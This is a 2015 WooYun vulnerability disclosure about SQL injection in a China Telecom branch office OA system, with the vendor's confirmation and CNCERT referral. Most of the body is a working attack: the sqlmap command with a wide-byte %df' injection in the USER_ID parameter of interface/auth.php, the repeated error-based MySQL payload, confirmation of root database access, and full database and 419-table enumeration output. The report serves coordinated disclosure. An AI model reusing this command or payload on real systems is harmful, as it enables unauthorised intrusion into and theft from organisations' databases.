当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148594

漏洞标题:中国电信分公司镇海电信系统SQL注入/root权限/419个表信息

相关厂商:中国电信

漏洞作者: 路人甲

提交时间:2015-10-22 12:35

修复时间:2015-12-10 16:50

公开时间:2015-12-10 16:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-22: 细节已通知厂商并且等待厂商处理中
2015-10-26: 厂商已经确认,细节仅向厂商公开
2015-11-05: 细节向核心白帽子及相关领域专家公开
2015-11-15: 细节向普通白帽子公开
2015-11-25: 细节向实习白帽子公开
2015-12-10: 细节向公众公开

简要描述:

详细说明:

sqlmap -u "**.**.**.**/interface/auth.php?&PASSWORD=1&USER_ID=%df%27%20" --dbms mysql --tamper=between


1.jpg


2.jpg


3.jpg


4.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: USER_ID
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: &PASSWORD=1&USER_ID=%df' AND (SELECT 9859 FROM(SELECT COUNT(*),CONCAT(0x7169726871,(SELECT (CASE WHEN (9859=9859) THEN 1 ELSE 0 END)),0x7172706871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- hKjO
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
current database: 'td_oa'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: USER_ID
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: &PASSWORD=1&USER_ID=%df' AND (SELECT 9859 FROM(SELECT COUNT(*),CONCAT(0x7169726871,(SELECT (CASE WHEN (9859=9859) THEN 1 ELSE 0 END)),0x7172706871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- hKjO
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
current user: 'root@**.**.**.**'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: USER_ID
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: &PASSWORD=1&USER_ID=%df' AND (SELECT 9859 FROM(SELECT COUNT(*),CONCAT(0x7169726871,(SELECT (CASE WHEN (9859=9859) THEN 1 ELSE 0 END)),0x7172706871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- hKjO
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
available databases [8]:
[*] BUS
[*] crscell
[*] information_schema
[*] mysql
[*] performance_schema
[*] TD_OA
[*] TD_OA_ARCHIVE
[*] TRAIN
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: USER_ID
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: &PASSWORD=1&USER_ID=%df' AND (SELECT 9859 FROM(SELECT COUNT(*),CONCAT(0x7169726871,(SELECT (CASE WHEN (9859=9859) THEN 1 ELSE 0 END)),0x7172706871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- hKjO
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: USER_ID
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: &PASSWORD=1&USER_ID=%df' AND (SELECT 9859 FROM(SELECT COUNT(*),CONCAT(0x7169726871,(SELECT (CASE WHEN (9859=9859) THEN 1 ELSE 0 END)),0x7172706871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- hKjO
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
Database: TD_OA
[419 tables]
+----------------------------------+
| session |
| user |
| version |
| address |
| address_group |
| affair |
| app_log |
| archive_tables |
| attachment |
| attachment_edit |
| attachment_module |
| attachment_position |
| attend_ask_duty |
| attend_config |
| attend_duty |
| attend_duty_shift |
| attend_evection |
| attend_holiday |
| attend_leave |
| attend_leave_manager |
| attend_machine |
| attend_manager |
| attend_out |
| attendance_overtime |
| bbs_board |
| bbs_comment |
| book_info |
| book_manage |
| book_manager |
| book_type |
| bs_line |
| calendar |
| categories_type |
| censor_data |
| censor_module |
| censor_words |
| chatroom |
| connect_config |
| connect_db |
| contact |
| contract |
| contract_line |
| countdown |
| cp_asset_keep |
| cp_asset_reflect |
| cp_asset_type |
| cp_assetcfg |
| cp_cptl_info |
| cp_dpct_sub |
| cp_prcs_prop |
| crm_account |
| crm_account_care |
| crm_account_contact |
| crm_action |
| crm_complain |
| crm_contract |
| crm_customer_service |
| crm_depository |
| crm_diary_setting |
| crm_email_html_model |
| crm_html_model |
| crm_marketing |
| crm_opportunity |
| crm_opportunity_products_list |
| crm_order |
| crm_order_products_list |
| crm_procurement_payment |
| crm_product |
| crm_product_type |
| crm_purchase_order |
| crm_purchase_order_products_list |
| crm_quotation |
| crm_quotation_products_list |
| crm_salepay |
| crm_solutions |
| crm_stockout |
| crm_stockout_products_list |
| crm_storage |
| crm_storage_products_list |
| crm_supplier |
| crm_supplier_contact |
| crm_sys_audit |
| crm_sys_code |
| crm_sys_code_type |
| crm_sys_entity |
| crm_sys_entity_index |
| crm_sys_entity_op |
| crm_sys_fast_new |
| crm_sys_field |
| crm_sys_layout_block |
| crm_sys_layout_item |
| crm_sys_list_view |
| crm_sys_list_view_color |
| crm_sys_list_view_default |
| crm_sys_list_view_field |
| crm_sys_list_view_map |
| crm_sys_list_view_order |
| crm_sys_list_view_rule |
| crm_sys_list_view_rule_parent |
| crm_sys_op |
| crm_sys_op_priv |
| crm_sys_op_priv_template |
| crm_sys_picklist |
| crm_sys_quick_link |
| crm_sys_relation |
| crm_sys_remind |
| crm_sys_remind_para |
| crm_sys_report |
| crm_sys_report_chart |
| crm_sys_report_column |
| crm_sys_report_dir |
| crm_sys_report_filter |
| crm_sys_report_filter_parent |
| crm_sys_report_group |
| crm_sys_report_summary |
| crm_sys_report_sysdefine |
| crm_sys_search |
| crm_sys_status |
| crm_sys_status_type |
| crm_sys_uv |
| crm_sys_uv_field |
| customer |
| daemon_config |
| daemon_hardware_info |
| daemon_process_info |
| daemon_services_config |
| daemon_services_status |
| daemon_services_tmp |
| data_source |
| data_source_field |
| data_src |
| db_server |
| department |
| dept_map |
| diary |
| diary_comment |
| diary_comment_reply |
| diary_share |
| doc_keywords |
| doc_print_log |
| doc_recv_data |
| doc_recv_prcs |
| doc_recv_priv |
| doc_send_data |
| doc_send_prcs |
| doc_type |
| doc_user_data |
| doc_user_data2 |
| efax_account |
| efax_receive_box |
| efax_send_box |
| email |
| email_body |
| email_box |
| email_boxgroup |
| email_name |
| esb_info |
| esb_msg_recv |
| esb_msg_send |
| esb_workflow |
| esb_workflow_model |
| esb_workflow_model_send |
| esb_workflow_rule |
| exam_data |
| exam_flow |
| exam_paper |
| exam_quiz |
| exam_quiz_set |
| ext_dept |
| ext_user |
| field_date |
| fieldsetting |
| file_content |
| file_sort |
| flow_data_106 |
| flow_data_107 |
| flow_data_108 |
| flow_data_109 |
| flow_data_111 |
| flow_data_112 |
| flow_data_113 |
| flow_data_114 |
| flow_data_116 |
| flow_data_117 |
| flow_data_118 |
| flow_data_119 |
| flow_data_12 |
| flow_data_120 |
| flow_data_121 |
| flow_data_122 |
| flow_data_123 |
| flow_data_124 |
| flow_data_125 |
| flow_data_126 |
| flow_data_127 |
| flow_data_128 |
| flow_data_129 |
| flow_data_130 |
| flow_data_131 |
| flow_data_132 |
| flow_data_133 |
| flow_data_134 |
| flow_data_135 |
| flow_data_136 |
| flow_data_137 |
| flow_data_138 |
| flow_data_3 |
| flow_data_32 |
| flow_data_35 |
| flow_data_64 |
| flow_form_type |
| flow_form_version |
| flow_hook |
| flow_manage_log |
| flow_print_tpl |
| flow_priv |
| flow_process |
| flow_query_tpl |
| flow_report |
| flow_report_priv |
| flow_rule |
| flow_run |
| flow_run_attach |
| flow_run_data |
| flow_run_feedback |
| flow_run_hook |
| flow_run_log |
| flow_run_prcs |
| flow_sort |
| flow_timer |
| flow_type |
| flow_version |
| form_sort |
| gbt_conf |
| gwiki_cate |
| gwiki_fav |
| gwiki_log |
| gwiki_priv |
| gwiki_tag |
| gwiki_template |
| gwiki_term |
| gwiki_term_final |
| gwiki_term_temp |
| hr_card_module |
| hr_care_task |
| hr_code |
| hr_insurance_default |
| hr_insurance_manage |
| hr_insurance_para |
| hr_integral_data |
| hr_integral_item |
| hr_integral_item_type |
| hr_integral_oa |
| hr_manager |
| hr_recruit_filter |
| hr_recruit_plan |
| hr_recruit_pool |
| hr_recruit_recruitment |
| hr_recruit_requirements |
| hr_sal_data |
| hr_staff_care |
| hr_staff_contract |
| hr_staff_incentive |
| hr_staff_info |
| hr_staff_labor_skills |
| hr_staff_learn_experience |
| hr_staff_leave |
| hr_staff_license |
| hr_staff_reinstatement |
| hr_staff_relatives |
| hr_staff_title_evaluation |
| hr_staff_transfer |
| hr_staff_work_experience |
| hr_training_examine |
| hr_training_plan |
| hr_training_record |
| hr_wage_manage |
| hr_welfare_manage |
| hrms |
| html_model |
| icqcontact_tb |
| im_cluster |
| im_discuss_group |
| im_discuss_maxmsgid |
| im_discuss_msg |
| im_group |
| im_group_maxmsgid |
| im_group_msg |
| im_message_cache |
| im_offline_file |
| index_article |
| index_keyword |
| index_search |
| interface |
| ip_rule |
| itask |
| itask_body |
| itask_category |
| itask_idea |
| itask_log |
| itask_msg |
| itask_tag |
| linkman |
| login_app |
| meeting |
| meeting_comment |
| meeting_equipment |
| meeting_room |
| meeting_rule |
| message |
| message2 |
| mobile_device |
| mobile_seal |
| module_priv |
| mytable |
| netchat |
| netdisk |
| netmeeting |
| news |
| news_comment |
| notes |
| notify |
| oa_cyclesource_used |
| oa_source |
| oa_source_used |
| oc_log |
| office_depository |
| office_products |
| office_task |
| office_transhistory |
| office_type |
| order_line |
| picture |
| plan_type |
| portal |
| product |
| proj_bug |
| proj_comment |
| proj_cost |
| proj_field_date |
| proj_fieldsetting |
| proj_file |
| proj_file_log |
| proj_file_sort |
| proj_forum |
| proj_priv |
| proj_project |
| proj_sys_code |
| proj_task |
| proj_task_log |
| provider |
| provider_linkman |
| rms_file |
| rms_lend |
| rms_roll |
| rms_roll_room |
| sal_data |
| sal_flow |
| sal_item |
| sale_history |
| sale_manager |
| score_date |
| score_flow |
| score_group |
| score_item |
| score_self_data |
| seal |
| seal_keylic |
| seal_log |
| secure_key |
| secure_log |
| secure_rule |
| service |
| sms |
| sms2 |
| sms2_priv |
| sms3 |
| sms_body |
| supply_history |
| supply_order |
| sys_code |
| sys_function |
| sys_log |
| sys_menu |
| sys_para |
| task |
| taskcenter |
| unit |
| url |
| user_ext |
| user_group |
| user_map |
| user_online |
| user_priv |
| vehicle |
| vehicle_maintenance |
| vehicle_oil_use |
| vehicle_operator |
| vehicle_usage |
| vi_flow_run |
| vi_user |
| vote_data |
| vote_item |
| vote_title |
| webmail |
| webmail_body |
| weixun_share |
| weixun_share_topic |
| wiki_ask |
| wiki_ask_answer |
| wiki_comment |
| wiki_info |
| winexe |
| word_model |
| work_detail |
| work_person |
| work_plan |
| zbap_paiban |
| zl_file |
+----------------------------------+

漏洞证明:

修复方案:

参数过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-10-26 16:49

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无